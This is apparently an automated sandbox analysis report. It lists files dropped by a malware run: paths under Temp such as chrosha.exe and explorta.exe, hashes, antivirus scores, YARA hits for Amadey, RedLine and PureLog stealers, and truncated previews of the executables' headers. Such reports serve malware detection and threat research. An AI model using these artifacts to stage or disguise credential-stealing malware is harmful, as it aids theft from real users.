                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101064
                                                                                                                                                                                                                                        Entropy (8bit):3.0391029842570747
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:asQGKwobTDOLGJXc/1FSqaUgok+z+Y+y+nXvu+4+soH+E+D+q+O+E+2+f+H+T+jV:9
                                                                                                                                                                                                                                        MD5:ECAA4F9E18FEB316E091C794371643AB
                                                                                                                                                                                                                                        SHA1:94572C9D2F6E03C1B6FFE13E4D4685E0843D370C
                                                                                                                                                                                                                                        SHA-256:C5B75C66C0A48D8B8C62D843DF090D11D254662381DE48D66F8FBA1F7E5BC760
                                                                                                                                                                                                                                        SHA-512:70CB4F4BD08BC3A486870F89ABB4ADB93CA2ED8530E1DB3010657AA705D74E3F8CCA9EC11DFC110D8F4884FD677A822E3D5C9BCE87B81CB80410561550956A33
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.6977698709752054
Encrypted:false
SSDEEP:96:TiZYWNYNVW9YCY1Wa6HtYEZoitCivESC7wGV7plRaXtMIjQMJSxI4RAI:2ZD/10JV/RadMIjQMJSu4RAI
MD5:3E2F8B9C041F896FE78280771EB703EA
SHA1:DE3BE156B9F7B9BD59BB3594E9E385413BC7256C
SHA-256:EBFAE8B3F4217E2C8BEB6384E28E2927513DD57ADB5D18A0C90B7D43FA84697B
SHA-512:742D0223278F3CA76E51ADF44091B60C61DACE329FAEBDCF5C7D8F829841820D29ED890D6C46A96D622E6B5AB7AFB82E644CEF07BB981FC8E7E390ADA5CFEB12
Malicious:false
Reputation:unknown
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):6320
Entropy (8bit):3.724169434824068
Encrypted:false
SSDEEP:192:R6l7wVeJmuE6jIYilWJ9ancHpDY89b6E4sfw6em:R6lXJ86MY4WJ9D6Erfj
MD5:24A2EA92C7DBB18EB1E97DC3ACAD889F
SHA1:88F1AE95EBA13D59A301F3DBA086B31C76C13D98
SHA-256:70CB8BE7893A144697F26BE3CBDE4EABEA8B83899F540A02F5C9C03FD6D822AA
SHA-512:57A8F3637E93F3C46ADF3FEFEAE953FF82D5B6BB55CA8E86A8CEDCEBB0AC965164AE9241E1292E2D451A094D89E1D647A99F6B2146BAF0E7AB0A75617B92C2C0
Malicious:false
Reputation:unknown
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4668
Entropy (8bit):4.488031716305001
Encrypted:false
SSDEEP:48:cvIwWl8zsqJg77aI9f0WpW8VY5Ym8M4JR7kF2+q874rj5ATineNfd:uIjf4I7Rt7V1Jdd5y+Md
MD5:2421192005E5E5D055EE9BEBC3ECD020
SHA1:8F3EE1FC27CBBB66C7A60CC1BB63F4701389CE88
SHA-256:004E356A1E69FE2133C5E1BB134195B70EF9323444896063F5BE49A7CDB68815
SHA-512:CD01E882346BDE70F399348F9F483B200A51D1D93D1EAC376A30676954CDF004D0043362195765AD7734EB784001CBC5AA422967F099E1950065FB51B2EE87AA
Malicious:false
Reputation:unknown
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292957" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):90308
Entropy (8bit):3.0368036861774823
Encrypted:false
SSDEEP:1536:/i4etqD22Gsuiq9a4zILtaWn+b+d+ZYd+9EdzJx3/NZja:/i4etqD22Gsuiq9a4zILtaWn+b+d+ZYe
MD5:DC2DD6FB6CCC1E8161EB59795E860AD3
SHA1:BE1305A32C63B2B59F001E3B01488E0D9F45CF0E
SHA-256:0A9B2CB29EB4202E4048BA9ACF836727074FC7FCE6313D78AB8493A5D8CE37EE
SHA-512:DF3E281260A86B7B53E43722D445B5BCE2E344C5FAC93F47466F1088B7AB17379A608FD613DD41163C41A65AC10DBD75922A9AEDE3498A121F7D7BBD3ACC975C
Malicious:false
Reputation:unknown
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):13340
Entropy (8bit):2.6866068333000084
Encrypted:false
SSDEEP:96:TiZYWHbXBPKiOYZOY2W85HeYEZnBtFib3jCDwMa3NWLea+Ez+MI0YfPIIVl3:2ZDE9mOWeceaDz+MI0YfPvVl3
MD5:CFE38BDDA1AA1A01CF2412C8C19D89CE
SHA1:22026D9DF773C55CD004C325B2BDC353D345E647
SHA-256:3B8F58E2352F043BED9155372FF403B407B76B1533C4B435AAE8884D2FABB56F
SHA-512:C278A123A5669864A1059FAB6A2242CCEAA8ACB2CFAF7914DE20FFCD2AAE15F30A43006054B2AA4CE47C133A6CBAF3C060E7053138F494FFE4ACA479228B6EF6
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):428544
Entropy (8bit):6.494348537450964
Encrypted:false
SSDEEP:12288:5noAx+FnmuQhimtPURimLqevmipum+K4Y:5+FnmuGtpMLnLYY
MD5:0099A99F5FFB3C3AE78AF0084136FAB3
SHA1:0205A065728A9EC1133E8A372B1E3864DF776E8C
SHA-256:919AE827FF59FCBE3DBAEA9E62855A4D27690818189F696CFB5916A88C823226
SHA-512:5AC4F3265C7DD7D172284FB28C94F8FC6428C27853E70989F4EC4208F9897BE91720E8EEE1906D8E843AB05798F3279A12492A32E8A118F5621AC5E1BE2031B6
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 76%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1954304
Entropy (8bit):7.949125787105512
Encrypted:false
SSDEEP:49152:bb8AxYTZxGZlY10exJdsegG+8G531KDR0S4hKUpy:bcTZx0cBnl+15u44
MD5:3AB592D71455D47170AB784430AE8102
SHA1:D1F9827AA3F176420CC15CB99963780934FE3CD1
SHA-256:41D1FAFA48A4F81C07C306577EE78968112A5B380A0BE1D6038C0833C6DF56A3
SHA-512:A718D3F7FF2B5D94435BDDDF37D16547C2FB695A2B620A7EA03504385AEB57C5BADDC351BAF57E0A43380AB0EBAF0031C4EC5C3D79CD196FEF934CA7D9750A4D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 45%
Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@M...........@..........................pM..........@.................................Vp..j....`......................p.M............................. .M..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..+.........................@...nkxbjlfg.....p2.....................@...kzjaljwy.....0M.....................@....taggant.0...@M.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2408448
                                                                                                                                                                                                                                        Entropy (8bit):7.927494038697244
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:lg69SebPPiKgYy0BmHY8vE79obDmwwBIfVraq0hV4qvKJgNHjBMFQ:lg69SebiYA879kDmwwwOq0hiqugd
                                                                                                                                                                                                                                        MD5:C5F77CF7894DE0F146E72AD8DA6A591B
                                                                                                                                                                                                                                        SHA1:D195F6EAF4A478C29328CCC0D22FA4B87A3118CC
                                                                                                                                                                                                                                        SHA-256:A4303E824749A711BBF166967D96B2927E33E9F5E4A61E8ADC6F3620F95790A6
                                                                                                                                                                                                                                        SHA-512:A3D32197CC377EEEB5461A02BF2B86E8E2D3CB125B6F1A60460478DE8477D43EDDDA88E4C45ACA4C292877B0BF82C06A3F2D4EC0DEA0A28B3A3F41F2A3276B52
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L...^.%f...............'.............@^...........@..........................P^.......%...@.................................^ ..r....p........................].............................l.].................................@................... . .`..........................@....rsrc........p......................@....idata ..... ......................@... ..+..0......................@...xoahvbru.....@D.....................@...vfiegpwq.....@^.......$.............@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):162304
                                                                                                                                                                                                                                        Entropy (8bit):7.967195699444992
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:I1lmOH349skOxH49PsH+8KqnuHV7A/5S+c6wABA47PN/6wHFHJ:I1iekOxYlI+EuH2cvAe4BywlH
                                                                                                                                                                                                                                        MD5:586F7FECACD49ADAB650FAE36E2DB994
                                                                                                                                                                                                                                        SHA1:35D9FB512A8161CE867812633F0A43B042F9A5E6
                                                                                                                                                                                                                                        SHA-256:CF88D499C83DA613AD5CCD8805822901BDC3A12EB9B15804AEFF8C53DC05FC4E
                                                                                                                                                                                                                                        SHA-512:A44A2C99D18509681505CF70A251BAF2558030A8648D9C621ACC72FAFCB2F744E3EF664DFD0229BAF7C78FB72E69F5D644C755DED4060DCAFA7F711D70E94772
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....G..........."...0..p...........4... ........@.. ....................................`.................................74..O....................................3..8............................................ ............... ..H............text...Po... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B................k4......H........$.................................................................]*....0............i.s........+...o.......X.... ....2..o.......o........8.........-N....d....(......(....&s..........o.........o...........o....r...p(.....3....+.s....%.o....%.o....%.o....%.o....%.o....%.o....%.Lo....%.o....%.o....%.o....%o.....Yo.........+........(...........o....+....2...X.. ....?........+<. ....... ...............XX.. ....].......................X.. ....2........8.......+w..X ....].
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):471152
                                                                                                                                                                                                                                        Entropy (8bit):7.708138361823541
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:dxFiggCdJqiuBD2wxLdCGZeJqld72RJ7/SB0UkUmpG:588Iiu8eLYm0qld6kBRRqG
                                                                                                                                                                                                                                        MD5:B22521FB370921BB5D69BF8DEECCE59E
                                                                                                                                                                                                                                        SHA1:3D4486B206E8AAAC14A3CF201C5AC152A2A7D4EA
                                                                                                                                                                                                                                        SHA-256:B30D10E292F89F4D288839974F71F6B703D6D9A9AE698EA172A2B64364E77158
                                                                                                                                                                                                                                        SHA-512:1F7D64BA5266314ED18F577F0984706C21F4F48E8CDB069130E4435C2BCDF219F8DD27E4D3BF3A373F4DB4C01E30EFE8D7F4D87F4D8CBBBEAF9C7043F685994C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3u.%w..vw..vw..v.f.w{..v.f.w...v.f.wb..v...we..v...wc..v.f.w~..vw..v*..v...w:..v...wv..v...wv..vRichw..v................PE..L....&f...............'.....j.......J............@..........................@............@.................................,I..d.......................p&... .. ..../.............................../..@...............T............................text............................... ..`.rdata..............................@..@.data...T....`.......@..............@....reloc.. .... ......................@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):311296
                                                                                                                                                                                                                                        Entropy (8bit):5.0817932970004
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:uq6EgY6i4rUjhYMLwPcologL/ejZWTACtAti0lcZqf7D34leqiOLibBOp:VqY6inwPDpKZWTA+AplcZqf7DIvL
                                                                                                                                                                                                                                        MD5:8510BCF5BC264C70180ABE78298E4D5B
                                                                                                                                                                                                                                        SHA1:2C3A2A85D129B0D750ED146D1D4E4D6274623E28
                                                                                                                                                                                                                                        SHA-256:096220045877E456EDFEA1ADCD5BF1EFD332665EF073C6D1E9474C84CA5433F6
                                                                                                                                                                                                                                        SHA-512:5FF0A47F9E14E22FC76D41910B2986605376605913173D8AD83D29D85EB79B679459E2723A6AD17BC3C3B8C9B359E2BE7348EE1C21FA2E8CEB7CC9220515258D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)v................0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2397184
                                                                                                                                                                                                                                        Entropy (8bit):7.929142981070319
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:Kg69SebPPiKgYy9bOxGNLL9zDNgvELoEewJTJo4759x:Kg69SebiLbhZL92vlEewlJo47v
                                                                                                                                                                                                                                        MD5:A5E341D76C1BE40293C678679CA9A729
                                                                                                                                                                                                                                        SHA1:D8687917F5B9B3C5D9F51996CE2F5A1CC4A539B2
                                                                                                                                                                                                                                        SHA-256:90652AABBE1B148E1F7FCF58914E0654097B3542638890F23CB61B194411E1BE
                                                                                                                                                                                                                                        SHA-512:207A8F2DBF1E62F8B6E9E0256C3A7BEF5BDBC05F264BE160067D5C59A77D08E516A820D3860B9BE6D2B45193C4C8B614EE81AF933DDFF04A3FACE2AC473DE6E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L...^.%f...............'..............]...........@...........................^.......$...@.................................m0.......p.......................6].............................d6].................................@................... . .`..........................@....rsrc........p......................@....idata .....0......................@... ..*..@......................@...unpqzwpm..... D.....................@...glmqmaxs......].......$.............@...................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1285632
Entropy (8bit):6.460276790319054
Encrypted:false
SSDEEP:24576:2vkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggv4+yC7:2sMPSYcS5wPi095PbgS4
MD5:F35B671FDA2603EC30ACE10946F11A90
SHA1:059AD6B06559D4DB581B1879E709F32F80850872
SHA-256:83E3DF5BEC15D5333935BEA8B719A6D677E2FB3DC1CF9E18E7B82FD0438285C7
SHA-512:B5FA27D08C64727CEF7FDDA5E68054A4359CD697DF50D70D1D90DA583195959A139066A6214531BBC5F20CD4F9BC1CA3E4244396547381291A6A1D2DF9CF8705
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 92%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d......e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):871224
Entropy (8bit):7.24103546516255
Encrypted:false
SSDEEP:12288:EA+sYjJA6W7c5f6ydp1xlxrekNp6MARWch8kDSX+/Pw9Glg3z/F1EIJQWwChTc55:EAwOc5zTderJ/Pe0g3PaWvdc5Fqe
MD5:021B6C96FE692E2BB8D4B0D02E9133B0
SHA1:4FF05288024AEF4F289C22E4E6985F82C29E49D5
SHA-256:FF477A862BD6E5ACEBE92887A6F221418DA1995DFB0ABED8527E21FDA9B8950B
SHA-512:AFC29E105225F8F92C74B8EAD1DF10BEDBF6C795CAD72C53A6CE6237B71D3F73E346CD6E0116C6A380F7D07E79FA5007E63DF8DFE414D0C7816AAF5828CEA482
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 30%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....'f.........."...0..v............... ....@...... ....................................`.........................................................................X2............................................................................... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@........................................H.......X&...o......`.....................................................................................................................................................................................(....*:.(......}....*..(.....r...p.(....o....s ...}....*..*.(....{....*r(....%-.&.*{.....(....o"...**..R.(....*r(....%-.&.*{.....(....o(...*..(/...*Z..}......}......}....*6.{.....o....*6.{.....o....*6.{.....o....*r.(K.....}......}......}....*J.(.....~....}....*>...~.....("...*>...~....
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):329352
Entropy (8bit):7.976897467568528
Encrypted:false
SSDEEP:6144:DFZcMaQk5oqtag00+wX3bSJxuI2Hc8PlsLNuPhRF1Ym:DFZg5Ztj00+03mJxmc8PfPwm
MD5:1C7D0F34BB1D85B5D2C01367CC8F62EF
SHA1:33AEDADB5361F1646CFFD68791D72BA5F1424114
SHA-256:E9E09C5E5D03D21FCA820BD9B0A0EA7B86AB9E85CDC9996F8F1DC822B0CC801C
SHA-512:53BF85D2B004F69BBBF7B6DC78E5F021ABA71B6F814101C55D3BF76E6D058A973BC58270B6B621B2100C6E02D382F568D1E96024464E8EA81E6DB8CCD948679D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 92%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]h.f................................. ........@.. ....................... .......b....`.................................L...O.......:................N........................................................... ............... ..H............text........ ...................... ..`.rsrc...:...........................@..@.reloc..............................@..B........................H........................................................................0..........r...p.*..(....*..0..........rg..p.*..(....*...]*.0..\.........i.s........+...o.......X.... ....2..o.......o........8.........-X....d....(......(....&s..........o......o.....1......o...........o....r...po.....3....+.s.........o.......o.......o.......o.......o.......o.......Lo.......o.......o...........o........o.....Yo.........+........(...........o....+....2...X.. ....?........+A..... ........
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1793536
Entropy (8bit):7.937675203377117
Encrypted:false
SSDEEP:49152:L/eYUVc8uWw3Sg6s8Zep6UXIEgf7WD4GTF:L/eYUW8bwUaPXVgzWMG
MD5:85A15F080B09ACACE350AB30460C8996
SHA1:3FC515E60E4CFA5B3321F04A96C7FB463E4B9D02
SHA-256:3A2006BC835A8FFE91B9EE9206F630B3172F42E090F4E8D90BE620E540F5EF6B
SHA-512:ADE5E3531DFA1A01E6C2A69DEB2962CBF619E766DA3D6E8E3453F70FF55CCBCBE21381C7B97A53D67E1CA88975F4409B1A42A759E18F806171D29E4C3F250E9F
Malicious:true
Yara Hits:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 96%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................T..........Nr... ........@.. ....................................`..................................r..K.......D............................q............................................... ............... ..H............text...TR... ...T.................. ..`.rsrc...D............V..............@..@.reloc...............\..............@..B................0r......H........w..x...........$....&...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z*...(....*..0..$.........r...p......~....(....~....(......*...]*....0................s.........}.......i..... .......... ...............&........}....8......{.......d.....~....(................{....~....(....s.........o.......o.......o.......o.......o............{....o........:............s
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):112128
Entropy (8bit):6.400356358225577
Encrypted:false
SSDEEP:3072:D4uSD+ZwruS0bGYuZRtasSVh/QEIegRQod4l:kuTiabruZR8JSlD4l
MD5:154C3F1334DD435F562672F2664FEA6B
SHA1:51DD25E2BA98B8546DE163B8F26E2972A90C2C79
SHA-256:5F431129F97F3D56929F1E5584819E091BD6C854D7E18503074737FC6D79E33F
SHA-512:1BCA69BBCDB7ECD418769E9D4BEFC458F9F8E3CEE81FEB7316BB61E189E2904F4431E4CC7D291E179A5DEC441B959D428D8E433F579036F763BBAD6460222841
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, Author: Joe Security
• Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey's Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 96%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L......e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2470704
Entropy (8bit):7.990554749886877
Encrypted:true
SSDEEP:49152:zgwRtL9Hckjh40JEvPXJnxNH0IHK61VW/2t+YKpEv6o2sUX7fEgvr:zgwRB98kj3JCPF71HKAV3+YAEaZ7fEgj
MD5:55F780EA4DC5A5401B80915D69A55481
